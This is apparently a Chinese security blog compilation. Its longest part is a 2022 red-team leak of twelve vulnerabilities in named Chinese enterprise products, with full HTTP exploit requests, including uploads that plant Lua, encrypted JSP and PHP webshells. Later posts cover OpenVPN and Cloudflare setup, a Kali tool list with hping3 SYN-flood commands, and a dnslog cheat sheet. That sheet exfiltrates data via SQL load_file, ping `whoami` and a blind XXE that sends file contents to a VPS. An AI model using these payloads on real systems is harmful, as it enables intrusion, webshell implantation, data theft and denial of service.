【2022护网情报更新】护网最新漏洞曝光，含POC 1、深信服VPN任意用户添加漏洞漏洞等级：严重，0day漏洞影响范围：未知漏洞详情：用户管理接口的权限控制出现漏洞，攻击者可任意添加用户。参考POC：POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1 Host: xxxxxx Cookie: language=zh_CN; sinfor_session_id=W730120C88755A7D932019B349CCAC63; PHPSESSID=cb12753556d734509d4092baabfb55dd; x-anti-csrf-gcs=A7DBB1DC0050737E; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D Content-Length: 707 Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Sec-Ch-Ua-Platform: "macOS" Accept: */* Origin: https://xxxxxx X-Forwarded-For: 127.0.0.1 X-Originating-Ip: 127.0.0.1 X-Remote-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D2、安恒数据大脑 API 网关任意密码重置漏洞漏洞等级：严重，可能为 0day 漏洞，目前捕获到在野的利用 POC；影响范围：未知；漏洞详情：在前端代码中包含重置密码的连接以及密码加密方式POC如下：POST /q/common-permission/public/users/forgetPassword HTTP/1.1 Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Language: en-US,en;q=0.5 Content-type: application/json Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 104 {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}3、360 天擎任意文件上传漏洞等级：严重影响范围：未知，应该是个0day漏洞详情：/api/client_upload_file.json 存在任意文件上传漏洞POC如下： POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 323 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox Q Referer: xxxxx Accept-Encoding: gzip ------WebKitFormBoundaryLx7ATxHThfk91oxQ Content-Disposition: form-data; name="file"; filename="flash.php" Content-Type: application/xxxx if ngx.req.get_uri_args().cmd then cmd = ngx.req.get_uri_args().cmd local t = io.popen(cmd) local a = t:read("*all") ngx.say(a) end------WebKitFormBoundaryLx7ATxHThfk91oxQ-- 4、万户 OA 文件上传漏洞漏洞等级：严重漏洞详情：/defaultroot/officeserverservlet 路径存在文件上传漏洞POC：POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li ke Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN Connection: close DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE VQ OPTION=U0FWRUZJTEU= RECORDID= isDoc=dHJ1ZQ== moduleType=Z292ZG9jdW1lbnQ= FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA== 111111111111111111111111111111111111111 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex t);}%> DBSTEP V3.0 170 0 1000170 是控制从报文中什么地方读取1000 是控制 webshell 源代码内容大小5、泛微 OA 文件上传漏洞等级：严重漏洞详情：/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞POC：POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 393 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="secId" 1 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="Filedata"; filename="testlog.txt" Test ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="plandetailid" 1 ------WebKitFormBoundarymVk33liI64J7GQaK—泛微OA /defaultroot/officeserverservlet ：：确认为历史漏洞；详情：/officeserverservlet 路径文件上传POC：POST /OfficeServer HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 207 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="aaa" {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'} ------WebKitFormBoundarymVk33liI64J7GQaK—7、泛微微 eoffice10 前台 getshell（eoffice10/version.json）:漏洞等级：严重，可能为 0day 漏洞；漏洞详情：版本号：http://XXXXXXX:8010/eoffice10/version.json<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data" > <input type="file" name="FileData"/></br></br> <input type="text" name="FormData" value="1"/></br></br> <button type=submit value="上传">上传</button> </form>POCPOST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: XXXXXXXX:8010 Content-Length: 378 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FileData"; filename="1.jpg" Content-Type: image/jpeg <?php echo md5(1);?> ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FormData" {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- 8、WebLogic中间件任意命令执行漏洞漏洞等级：严重，厂商尚未发布补丁影响范围：未知漏洞详情：攻击者可利用T3/IIOP接口发送恶意内容，导致任意命令执行9、XxxNC前台反序列化漏洞：漏洞等级：严重，确认为历史漏洞；漏洞影响版本: nc 6.5；10、Txxxb的前台未授权反序列化漏洞:漏洞等级：严重，确认为 0day 漏洞，目前漏洞在野利用；11、天融信天眼系统命令执行0day漏洞漏洞等级：严重影响范围：未知漏洞详情：攻击者通过序列号加密要执行的攻击payload，再通过另一个未授权的接口将攻击payload上载到服务器，由服务器解密并执行此段payload，从而实现远程命令执行，获取系统服务器权限。应急防护： 先禁止访问漏洞路径：/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands检查所有安全流量监控设备是否存在对外映射，如有一律停止映射3）添加攻击特征进行监控：/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands12、天融信 - 上网行为管理系统 一句话木马/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a

centos7搭建openvpn实现科学上网 关闭selinux[root@localhost ~]# sed -i '/^SELINUX/s/enforcing/disabled/g' /etc/selinux/config[root@localhost ~]# setenforce 0安装epel仓库和openvpn, Easy-RSA[root@localhost ~]# yum -y install epel-release && yum -y install openvpn easy-rsa配置EASY-RSA 3.0在/etc/openvpn文件夹下面创建easy-rsa文件夹，并把相关文件复制进去（此处可能版本会不同，根据实际情况进行复制）[root@localhost ~]# cp -r /usr/share/easy-rsa/3/* /etc/openvpn/easy-rsa/[root@localhost ~]# cp -p /usr/share/doc/easy-rsa-3.0.6/vars.example /etc/openvpn/easy-rsa/vars创建OpenVPN相关的密钥我们将创建CA密钥，server端、client端密钥，DH和CRL PEM, TLS认证钥匙ta.key。[root@localhost easy-rsa]# cd /etc/openvpn/easy-rsa/初始化并建立CA证书创建服务端和客户端密钥之前，需要初始化PKI目录[root@localhost easy-rsa]# ./easyrsa init-pki[root@localhost easy-rsa]# ./easyrsa build-ca nopass创建服务器密钥创建服务器密钥名称为 server1.key[root@localhost easy-rsa]# ./easyrsa gen-req server1 nopass添加nopass 选项，是指不需要为密钥添加密码。用CA证书签署server1密钥[root@localhost easy-rsa]# ./easyrsa sign-req server server1创建客户端密钥创建客户端密钥名称为 client1.key[root@localhost easy-rsa]# ./easyrsa gen-req client1 nopass用CA证书签署client1密钥[root@localhost easy-rsa]# ./easyrsa sign-req client client1创建DH密钥根据在顶部创建的vars配置文件生成2048位的密钥[root@localhost easy-rsa]# ./easyrsa gen-dh创建TLS认证密钥[root@localhost easy-rsa]# openvpn --genkey --secret /etc/openvpn/easy-rsa/ta.key生成 证书撤销列表(CRL)密钥CRL(证书撤销列表)密钥用于撤销客户端密钥。如果服务器上有多个客户端证书，希望删除某个密钥，那么只需使用./easyrsa revoke NAME这个命令撤销即可。生成CRL密钥：[root@localhost easy-rsa]# ./easyrsa gen-crl复制证书文件复制ca证书，ta.key和server端证书及密钥到/etc/openvpn/server文件夹里[root@localhost easy-rsa]# cp -p pki/ca.crt /etc/openvpn/server/[root@localhost easy-rsa]# cp -p pki/issued/server1.crt /etc/openvpn/server/[root@localhost easy-rsa]# cp -p pki/private/server1.key /etc/openvpn/server/[root@localhost easy-rsa]# cp -p ta.key /etc/openvpn/server/复制ca证书，ta.key和client端证书及密钥到/etc/openvpn/client文件夹里[root@localhost easy-rsa]# cp -p pki/ca.crt /etc/openvpn/client/[root@localhost easy-rsa]# cp -p pki/issued/client1.crt /etc/openvpn/client/[root@localhost easy-rsa]# cp -p pki/private/client1.key /etc/openvpn/client/[root@localhost easy-rsa]# cp -p ta.key /etc/openvpn/client/复制dh.pem , crl.pem到/etc/openvpn/client文件夹里[root@localhost easy-rsa]# cp pki/dh.pem /etc/openvpn/server/[root@localhost easy-rsa]# cp pki/crl.pem /etc/openvpn/server/修改OpenVPN配置文件复制模板到主配置文件夹里面[root@localhost server]# cp -p /usr/share/doc/openvpn-2.4.8/sample/sample-config-files/server.conf /etc/openvpn/server/修改后的内容如下[root@localhost server]# cat server.conf |grep '^1'port 1194proto udpdev tunca ca.crtcert server1.crtkey server1.key # This file should be kept secretdh dh.pemcrl-verify crl.pemserver 10.8.0.0 255.255.255.0ifconfig-pool-persist ipp.txtpush "redirect-gateway def1 bypass-dhcp"push "dhcp-option DNS 114.114.114.114"duplicate-cnkeepalive 10 120tls-auth ta.key 0 # This file is secretcipher AES-256-CBCcompress lz4-v2push "compress lz4-v2"max-clients 100user nobodygroup nobodypersist-keypersist-tunstatus openvpn-status.loglog-append openvpn.logverb 3explicit-exit-notify 1开启转发修改内核模块[root@localhost server]# echo 'net.ipv4.ip_forward = 1' >> /etc/sysctl.conf[root@localhost server]# sysctl -pnet.ipv4.ip_forward = 1修改防火墙[root@localhost server]# firewall-cmd --permanent --add-service=openvpnsuccess[root@localhost server]# firewall-cmd --permanent --add-interface=tun0success[root@localhost server]# firewall-cmd --permanent --add-masqueradesuccess[root@localhost server]# firewall-cmd --permanent --direct --passthrough ipv4 -t nat -A POSTROUTING -s 10.8.0.0/24 -o ens33 -j MASQUERADEsuccess[root@localhost server]# firewall-cmd --reloadsuccess启动服务并开机启动[root@localhost server]# systemctl enable openvpn-server@server[root@localhost server]# systemctl start openvpn-server@server检查一下服务是否启动[root@localhost server]# netstat -tlunp[root@localhost server]# systemctl status openvpn-server@serverOpenVPN 客户端安装在openvpn服务器端操作，复制一个client.conf模板到/etc/openvpn/client文件夹下面。然后编辑该文件/etc/openvpn/client/client.conf[root@localhost openvpn]# cp -p /usr/share/doc/openvpn-2.4.8/sample/sample-config-files/client.conf /etc/openvpn/client/修改后的内容如下[root@localhost client]# cat client.conf |grep '^1'clientdev tunproto udpremote 192.168.43.138 1194resolv-retry infinitenobindpersist-keypersist-tunca ca.crtcert client1.crtkey client1.keyremote-cert-tls servertls-auth ta.key 1cipher AES-256-CBCverb 3更改client.conf文件名为client.ovpn，然后把/etc/openvpn/client文件夹打包压缩：更改client.conf文件名为client.ovpn[root@localhost openvpn]# mv client/client.conf client/client.ovpn安装lrzsz工具，通过sz命令把 client.tar.gz传到客户机上面[root@localhost openvpn]# yum -y install lrzsz打包client文件夹[root@localhost openvpn]# tar -zcvf client.tar.gz client/使用sz命令，把client.tar.gz传到客户机上面[root@localhost openvpn]# sz client.tar.gz在windows 10客户机连接测试客户机安装openvpn-install-2.4.8-I602-Win10该软件包，安装完成之后解压刚才的client.tar.gz压缩包，把里面的文件复制到C:\Program Files\OpenVPN\config需要把client.conf的名字改成client.ovpn，然后点击桌面上的OpenVPN GUI运行电脑右下角有一个小电脑右键点击连接，连接成功之后小电脑变成绿色。注意事项做实验时在测试环境做的。如果在真实环境操作，请在出口防火墙添加端口映射，开放openvpn的端口1194 tcp和udp协议的。证书文件整合ca.crt | client1.crt | client1.csr | client1.key | client.ovpn 合并成一个文件：把ca.crt证书放入client.ovpn配置文件如果你有好几个网站的openvpn配置你可以在config目录下为每一个网站建一个文件夹，也可以都放在config目录下，不过是不是有很多.crt和.key文件很烦人呀，其实你可以把它们都删除了，只需要把他们放入client.ovpn配置文件。用写字板打开各个client.ovpn文件在最后面添加key-direction 1用记事本打开ca.crt把文件内容复制到和的中间，用记事本打开client.crt把文件内容复制到和的中间，用记事本打开client.key把文件内容复制到和的中间，用记事本打开ta.key把文件内容复制到和的中间，（ca.crt、client.crt、client.key、ta.key这些文件不一定全都与，有那些就修改那些；这些文件的名字不一定都是这样，可以在.ovpn配置文件里搜索ca、cert、key、tls-auth看他们所对应的文件名）修改完成后删除类似tls-auth ta.key 1ca ca.crtcert client.crtkey client.key的那几行，然后保.ovpn文件即可删除那些.crt和.key文件而正常使用了。对了，若有ddns或者IP映射和固定域名，记得修改.ovpn文件中的remote 属性remote 192.168.3.122 1194win10客户端连接过程中会提示2个警告信息警告1：Fri May 08 00:19:05 2020 WARNING: --ns-cert-type is DEPRECATED. Use --remote-cert-tls instead.解决：win客户端修改配置文件注释一个和添加一个;ns-cert-type serverremote-cert-tls server警告2：Fri May 08 00:19:06 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this解决：win10客户端配置文件添加auth-nocache#|^; ↩

使用cloudflare申请免费cdn 网址如下：https://dash.cloudflare.com首先注册一个账号注册好后，点击添加站点，输入你的域名，然后会自动去读取你的a记录，如果读不出来就手动按照阿里云域名里的记录去添加一下记录重点来了，这里给了两个dns服务器，你需要在你注册域名的对应服务商修改dns服务器比如我的是阿里云注册的域名找到域名-dns管理-点击修改dns为上面提供的两个dns服务器然后点击下一步，两个http相关设置都关闭优化性能全部勾选然后点击完成即可，等待阿里云dns服务器更新完毕即可回到概述就会看到正在保护站点全国ping一下Nslookup 查询一下

kali常用工具（持续更新中） arping主要用来解析ip的mac地址常用参数：-c 10 发送10次-w 10 10秒后停止发送-U：无理由的（强制的）ARP模式去更新别的主机上的ARP CACHE列表中的本机的信息，不需要响应。 -i eth0：指定网卡进行发送请求包使用截图Hping3用来端口扫描、拒绝服务攻击等常用命令端口扫描hping3 -I eth0 -S 192.168.10.1 -p 80 # 测试80端口是否开放拒绝服务攻击使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000其他攻击如smurf、teardrop、land attack等也很容易构建出来。hping3 -c 100000 -d 120 -S -w 64 -p 80 --flood --rand-source baidu.comDnsenumDNSenum是一款dns查询工具。它能够通过Google或字典文件猜测可能存在的域名，并对一个网段进行反向查询。Dnsmap-w 指定用户自己的字典文件。使用方法：dnsmap sina.com -w my_dns.txt-r 指定一个目录，将扫描到的结果保存到这个指定的目录中，并以当前时间戳命名。使用方法：dnsmap sina.com -r /tmp/-d 指定一个正整数，使得 dnsmap 在暴力扫面的时候能够周期性的休眠，这样不会占用系统带宽。单位是毫秒。使用方法：dnsmap sina.com -d 600-i 后面可以跟一个或者多个 IP 地址，使用逗号隔开，这样扫描结果中就会过滤掉有这些 IP 的结果-c 保存结果为 CSV 格式。以上这些参数可以混合使用，例如：dnsmap http://sina.com -d 800 -r /tmp/ -c /tmp/ -i 10.55.206.154,10.55.24.100 -w wordlist.txt另外，如果要批量扫描多个域名，可以将域名保存为 domains.txt 文件，每个域名占一行，然后使用 dnsmap-bulk.sh 这个脚本批量执行，用法：dnsmap-bulk.sh domains.txt /tmp/results/后面跟一个路径表示把结果保存到这个目录中。再提供几个下载 dns 字典文件的网址吧：http://packetstormsecurity.org/Crackers/wordlists/dictionaries/ http://www.cotse.com/tools/wordlists1.htm http://wordlist.sourceforge.net/Wafw00f主要用来检测网站是否有waf，以及是什么waf常用命令：wafw00f -a baidu.comNmapNmap（也就是Network Mapper，最早是Linux下的网络扫描和嗅探工具包）是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。常用参数：-sS 半连接扫描，不会留下痕迹 -sV 查看端口提供的服务对应的版本 -O 扫描操作系统版本 -sT tcp扫描 -sU udp扫描 -sP ping扫描，会在判断主机存活后才会进行扫描 -Pn 不使用ping命令去进行扫描，用于防火墙禁ping时 -PR 使用arp协议进行主机发现，只适合局域网内，速度快，准确度高弱口令扫描nmap --script=auth ip 对某个主机或某网段主机的应用进行弱口令检测如：nmap --script=auth 192.168.0.101暴力破解nmap --script=brute ip   可以对数据库、MB、SNMP等进行简单的暴力破解如：nmap --script=brute 192.168.0.101扫描常见漏洞nmap --script=vuln ip 如：nmap --script=vuln 192.168.0.101Ip信息收集nmap --script ip-geolocation-* yihao.websiteWhois查询（貌似没啥用，我自己的域名都查不到）nmap --script whois-domain yihao.websiteNmap自带脚本位置：/usr/share/nmap/scripts/Legion综合性扫描工具，可以调用nmap、nikto、hydra等其他工具去进行综合扫描在02-漏洞分析那块，如果没有的话需要手动安装一下：apt install legion，安装完就会自动跑到这里去，该工具是图形化工具，需要在远程桌面执行开启Searchsploit“searchsploit”是一个用于Exploit-DB的命令行搜索工具，可以帮助我们查找渗透模块。Exploit-DB是一个漏洞库，Kali Linux中保存了一个该漏洞库的拷贝，利用上面提到的命令就可以查找需要的渗透模块，它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的，在没有网络的情况下也可以使用。基本搜索方法就是searchsploit+可能包含漏洞的软件/系统等等，对应回显存在的漏洞和用于渗透的脚本。常用命令：Searchsploit -t 漏洞标题名称 Searchsploit -p 端口 搜索端口漏洞 Searchsploit mysql 搜索mysql数据库相关的漏洞

dnslog盲打命令速查 1.什么是dnslog要求DNSlog是什么？DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名www.baidu.com等的访问信息，类似日志文件2.dnslog通常用在哪个地方1.SQL盲注 2.无回显的XSS 3.无回显的命令执行 4.无回显的SSRF 5.Blind XXE2.1.SQL盲注无论时时间盲注还是布尔盲注，都需要发送大量的数据包去判断数据，很容易导致被waf封IP，如果条件允许的话，可以使用dnslog进行快速的数据外带。以Mysql为例，通过dnslog外带数据需要用到load_file函数，所以一般得是root权限，并且secure_file_priv得为空payload： select load_file(concat('\\\\',(select hex(user())),'.dnslog\\aa')); 注意：后面的aa文件存不存在不重要，随便写都行，但是必须要写，因为是load_file函数需要的条件以dvwa靶场为例（已手动修改：secure_file_priv=”)：1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.xxxx.ceye.io/as')))# //查询当前数据库第一个表，第二个类推``` 2.2.无回显的XSSpayload: <ImG src=http://xss.9e5ehg.dnslog.cn>然后回头看下dnslog，证明漏洞存在。2.3.无回显的命令注入发现疑似命令执行的洞，但是目标站点什么也不显示，无法确认是不是有漏洞。windows： ping %USERNAME%.us0r6c.dnslog.cn linux: ping `whoami`.us0r6c.dnslog.cn 或者 x=`hostname`;ping -c 1 $x.d7jlma.dnslog.cn下面是windows常用的变量。//变量 类型 描述 //%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。 //%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。 //%CD% 本地 返回当前目录字符串。 //%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。 //%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。 //%COMPUTERNAME% 系统 返回计算机的名称。 //%COMSPEC% 系统 返回命令行解释器可执行程序的准确路径。 //%DATE% 系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。 //%ERRORLEVEL% 系统 返回上一条命令的错误代码。通常用非零值表示错误。 //%HOMEDRIVE% 系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 //%HOMEPATH% 系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 //%HOMESHARE% 系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 //%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。 //%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数目。 //%OS% 系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。 //%PATH% 系统 指定可执行文件的搜索路径。 //%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。 //%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。 //%PROCESSOR_IDENTFIER% 系统 返回处理器说明。 //%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。 //%PROCESSOR_REVISION% 系统 返回处理器的版本号。 //%P ROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。 //%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。 //%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。 //%SYSTEMROOT% 系统 返回 Windows server operating system 根目录的位置。 //%TEMP%和%TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。 //%TIME% 系统 返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。 //%USERDOMAIN% 本地 返回包含用户帐户的域的名称。 //%USERNAME% 本地 返回当前登录的用户的名称。 //%USERPROFILE% 本地 返回当前用户的配置文件的位置。 //%WINDIR% 系统 返回操作系统目录的位置。2.4.无回显的SSRF这边用的是vulhub的一个weblogic的ssrf漏洞。/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://rsr8pf.dnslog.cn 然后查看dnslog有记录，就很有可能存在ssrf漏洞2.5.Blind XXE这边用的是pikachu靶场，项目地址：https://github.com/zhuifengshaonianhanlu/pikachu2.5.1.未修改源码前，可以看到是有回显的。<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///C://phpstudy_pro/Extensions/MySQL5.7.26/my.ini" > ]> <value>&xxe;</value>2.5.2.修改源码，使其变成无回显。<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "http://zhwzti.dnslog.cn" > ]> <value>&xxe;</value>无回显，但是可以看到dnslog收到请求，证明xxe漏洞存在。文件读取注：这里需要一个VPS，VPS中放入一个DTD的文件，文件dtd内容如下：<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C://phpstudy_pro/Extensions/MySQL5.7.26/my.ini"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.232.131:1333/?p=%file;'">然后利用python3开启http服务。python3 -m http.server --bind 0.0.0.0 1333pyload： <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % dtd SYSTEM "http://192.168.232.131:1333/evil.dtd"> %dtd;%int;%send;]>burp suite提交数据后，vps获得一串base64编码。将base64编码拿去解码后就是my.ini的文件内容。